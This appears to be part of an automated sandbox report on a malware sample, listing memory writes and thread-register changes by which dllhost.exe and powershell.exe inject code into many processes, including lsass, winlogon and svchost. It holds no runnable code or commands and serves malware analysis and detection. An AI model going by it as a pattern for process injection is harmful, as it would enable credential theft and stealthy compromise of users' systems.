Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 277167A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 277167D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 22123BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 22123BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 13F081C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 13F08E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 16AA5E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 16AA5EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A7E22C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1FD17760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A7E22F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1FD186A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 27052A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 27052A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: unknown base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 5640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 2E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 30B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: unknown base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 34D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2A3D0DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 28FF0B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2A3D0F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 24D03D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21336150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 28FF0B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21350470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 196FB050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 196FB050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A4E5670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1FFFD320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F8C8FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F8CB040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 2580 base: 9070000 value: 4D
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 2580 base: 9070000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 1740Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 8040
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 1244
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: 1740 1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 870000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 34D5B74010
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B3A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADECD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B47B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20870060000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF60000
